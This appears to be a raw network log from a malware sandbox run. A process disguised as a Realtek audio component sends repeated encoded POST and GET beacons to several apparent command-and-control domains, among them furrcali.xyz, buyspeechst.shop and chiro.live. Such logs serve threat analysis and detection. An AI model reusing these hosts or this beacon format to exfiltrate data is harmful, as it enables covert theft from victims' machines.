                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aYixJhRfpq/oNuKVtiPe/Q==
                                                                          Jan 9, 2025 16:50:25.749278069 CET | 242 | IN | HTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:25 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          42 | 192.168.11.20 | 49787 | 103.106.67.112 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:28.198297024 CET | 815 | OUT | POST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsB4zb8Wz8xo6XxcjGiKZk=
                                                                          Jan 9, 2025 16:50:28.452150106 CET | 242 | IN | HTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:28 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          43 | 192.168.11.20 | 49788 | 103.106.67.112 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:30.896866083 CET | 2578 | OUT | POST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:30.896893978 CET | 5156 | OUT
                                                                          Data Ascii: DSUk0RwDKgi9sGi0YCPtVzin7FG8MGl4e71ERA1P4FDMd6VysoQaVsCpK1jy2TseMLzFaSqgoZ2pSS7jYmA1Ij0VYvip0IOro1HMYmtydfeFdTSRdnpZt3SsbsKXhtGhDcPpwR3UdZ/a8kp99rbUiGdLZw0VyUChxPPoEtPk6TaHAQvskgiViXCHXZsTD2ZtJYx256Nk7fiQmQxKjxQzALWslC6d9DIGInqL1NEQsC0+Bi3Hccb
                                                                          Jan 9, 2025 16:50:30.896965027 CET | 230 | OUT
                                                                          Data Ascii: q6rM7yDRmU3QstA1Co9FTPfO1QpW6xW278iNp3xrR/KxNIbAKZYW5nE9fpMmATs7Y72LR+313CJ8kZ3Y0s+axeIo1RBFGaR9YP1lSIDfK3OK6qsgwTOL8Nwsw8KKQNzijACou7hM8cnRaPDcJL69xKbl1ThH2vlJEE4y6xDxBGAweUWYHIM7vO7FANMPTDfqPWAUE7Ek3taaHuo4Scke/37sMXHYrxCb9xFA==
                                                                          Jan 9, 2025 16:50:31.150913000 CET | 242 | IN | HTTP/1.1 302 Found
                                                                          Location: https://www.furrcali.xyz/k29t/
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:31 GMT
                                                                          Content-Length: 0
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          44 | 192.168.11.20 | 49789 | 103.106.67.112 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:33.601604939 CET | 530 | OUT | GET /k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:33.855196953 CET | 619 | IN | HTTP/1.1 302 Found
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Location: https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw
                                                                          Server: Dynamic Http Server
                                                                          X-Ratelimit-Limit: 101
                                                                          X-Ratelimit-Remaining: 100
                                                                          X-Ratelimit-Reset: 1
                                                                          Date: Thu, 09 Jan 2025 15:50:33 GMT
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Data Ascii: <a href="https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&amp;LSbaT=zft4LoBw">Found</a>.


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          45 | 192.168.11.20 | 49790 | 104.21.112.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:39.149307966 CET | 807 | OUT | POST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrTz+u4G/6cnFhC638lmpww==
                                                                          Jan 9, 2025 16:50:39.402750969 CET | 1059 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:39 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLueVAdh4mizLzPAFxBT5pY2ssW1VIRipybrEwS3KbMuzsL0rMcio9kLSdR0zZZ6dDJqEkQM9%2BUn8SG3zWxrtgb7uauMp3IM08CIPKkzQnBduXHQxsgvG3vsLyIMFdIq%2Bl8FCD0L1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5958f1c0ff865-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118739&min_rtt=118739&rtt_var=59369&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:50:39.402765989 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          46 | 192.168.11.20 | 49791 | 104.21.112.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:41.797319889 CET | 827 | OUT | POST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+v4W622RNJKnR3JlR0WF1s=
                                                                          Jan 9, 2025 16:50:42.056384087 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:42 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctFN4TaJT%2B0gJxpkFJebArmioPfFs2kHe842w64H%2FYlPqDB3UplOHDxdGyq%2B1DrDhV9YDYEmtIdJI29EP51XDNFjRx25%2FbcSJLsir89tZq7Ql%2Fg6bq%2BjIqWFBG%2FVEYS4xQjm3AGnPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5959faff5eaf7-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=128251&min_rtt=128251&rtt_var=64125&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=827&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:50:42.056399107 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          47 | 192.168.11.20 | 49792 | 104.21.112.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:44.451785088 CET | 2578 | OUT | POST /w98i/ HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.buyspeechst.shop
                                                                          Referer: http://www.buyspeechst.shop/w98i/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV= [TRUNCATED]
                                                                          Jan 9, 2025 16:50:44.451836109 CET | 5398 | OUT | Data Ascii: 7oyTx9kcuiSNcoAd5+PZNxz043bqt6ffSw4CTNHMbzEYMkAIe+n6IChHcTOyo/diV7wo4jLo1CEc0jtyL1VnZZgz4CewQNWk7BftKEPOdedaGmAk6iQ22Vk4fEzsxzmCyqV/Dh84c/RSPZrFh/xC2bcejqtoDATXPyWAQmejm0/4DISD9PctIC/Fuf3krdmo/4mKV7XTxXyH36NOmC5fMTh4xxKR9gH6Ytq0JBI4A1hwWA9XrRE
                                                                          Jan 9, 2025 16:50:44.772950888 CET | 1064 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:44 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOoijhS9hbpWsqe90%2B6jaKysCqjmz%2BitwTks8LZlLEQ1CvB5ivpkjRt1a5wnblPHuE9j6InGQnBnCr8lzn06CAlR95WAOJRuKK7y%2BzCOeoReFWI2vjN3JzkMhi6D%2FBlkwOqbyCz0Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff595b0392e10b4-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119085&min_rtt=119085&rtt_var=59542&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7976&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:50:44.773082972 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          48 | 192.168.11.20 | 49793 | 104.21.112.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:47.104903936 CET | 534 | OUT | GET /w98i/?lV=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:47.744864941 CET | 814 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:47 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AVP%2F7HpE%2FW7Waeocc%2BFhfvYe%2BtIc8MzgSKH2Pf%2BWoBEWMtfqofeYBHRfDLljOxa%2B%2Bb5%2B5vLyB0sQqYkAF7jEEdSdYdTsvYORwEY0REsPeDDM1YKk7IZULT4PZ6AosEzQ3DCb3B8Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff595c0df92f865-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118684&min_rtt=118684&rtt_var=59342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:50:47.744882107 CET | 273 | IN | Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port
                                                                          Jan 9, 2025 16:50:47.745018005 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          49 | 192.168.11.20 | 49794 | 194.9.94.85 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:51:04.243014097 CET | 528 | OUT | GET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1
                                                                          Host: www.milp.store
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:04.492722034 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:51:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.1.30
                                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                          Jan 9, 2025 16:51:04.492779016 CET | 1289 | IN | Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                          Jan 9, 2025 16:51:04.492858887 CET | 1289 | IN | Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                          Jan 9, 2025 16:51:04.492899895 CET | 1289 | IN | Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                          Jan 9, 2025 16:51:04.493123055 CET | 661 | IN | Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                          Jan 9, 2025 16:51:04.493166924 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          50 | 192.168.11.20 | 49795 | 198.58.118.167 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:51:09.654333115 CET | 789 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
                                                                          Jan 9, 2025 16:51:09.800008059 CET | 806 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:09 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          51 | 192.168.11.20 | 49796 | 198.58.118.167 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:51:12.329804897 CET | 809 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
                                                                          Jan 9, 2025 16:51:12.475404024 CET | 805 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:12 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          52 | 192.168.11.20 | 49797 | 198.58.118.167 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:51:15.001622915 CET | 2578 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:15.001667976 CET  5380               OUT
                                                                          Data Ascii: fgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP/+PH
                                                                          Jan 9, 2025 16:51:15.147986889 CET  806                IN         HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:15 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                          53          192.168.11.20  49798        198.58.118.167  80
                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                          Jan 9, 2025 16:51:17.670087099 CET  528                OUT        GET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:17.815334082 CET  1289               IN         HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:17 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          connection: close
